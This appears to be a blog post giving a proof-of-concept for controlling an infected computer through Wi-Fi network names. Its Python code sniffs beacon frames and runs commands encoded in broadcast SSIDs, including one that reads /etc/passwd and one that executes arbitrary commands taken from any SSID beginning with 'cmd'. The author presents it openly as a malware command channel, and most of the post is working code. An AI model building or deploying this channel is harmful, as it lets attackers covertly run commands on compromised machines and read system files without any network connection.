Controlling a PC using Wifi SSID's
Controlling a PC using Wifi SSID’s
There are different forms of controlling a system without connection with Internet or other network. In this PiC we will use the name of the wireless network, the SSIDs.
If infect a system only we will need that this have a wireless card, we will listen the network’s names and if the malware find a name that it identify as a command, it will execute this command in the infected machine.
Let’s do it, in first place we will need listen and parse the name of the wireless networks. For this task I will use the library socket, with this library is very easy parse a network packets. You can use scapy for this task also is very easy of use.
import socket
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
sock.bind(("mon0", 0x0003))
while True:
pkt = sock.recvfrom(2048)[0]
if pkt[26] == "\x80" :
if pkt[36:42] and ord(pkt[63]) > 0:
ssid=pkt[64:64 +ord(pkt[63])]
mac=pkt[36:42].encode('hex')
print("MAC:{0} SSID:{1}".format(mac,ssid))
We will need capture the Beacon frames, this type is the ID 0b1000 or 0x80 according the IEEE 802.11 standard.
Quick reference guide
Type | SubtypeType(bin) | Description |
---|---|---|
mgmt | 0000 | Association Request |
mgmt | 0001 | Association Response |
mgmt | 0010 | Reassociation Request |
mgmt | 0011 | Reassociation Response |
mgmt | 0100 | Probe Request |
mgmt | 0101 | Probe Response |
mgmt | 1000 | Beacon |
mgmt | 1001 | ATIM |
mgmt | 1010 | Disassociation |
mgmt | 1011 | Authentication |
mgmt | 1100 | Deauthentication |
Code
Now, we already know obtain the network name, the next task is implement different commands. This is the complete code of this PoC:
#!/usr/bin/env python
import argparse
import subprocess
import socket
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0003))
parser = argparse.ArgumentParser()
parser.add_argument('-v', action='count', dest='verbose')
parser.add_argument('-i', dest='interface')
args=parser.parse_args()
sock.bind((args.interface, 0x0003))
while True:
pkt = sock.recvfrom(2048)[0]
if pkt[26] == "\x80" :
if pkt[36:42] and ord(pkt[63]) > 0:
ssid=pkt[64:64 +ord(pkt[63])]
mac=pkt[36:42].encode('hex')
if ssid=="getPasswd":
out = subprocess.check_output(['cat','/etc/passwd'])
if args.verbose==1:
print out
if ssid[0:3]=="cmd":
out = subprocess.check_output([ssid[3:]])
if args.verbose==1:
print out
if args.verbose==2:
print "SSID: %s AP MAC: %s" % (pkt[64:64 +ord(pkt[63])], pkt[36:42].encode('hex'))
Regards!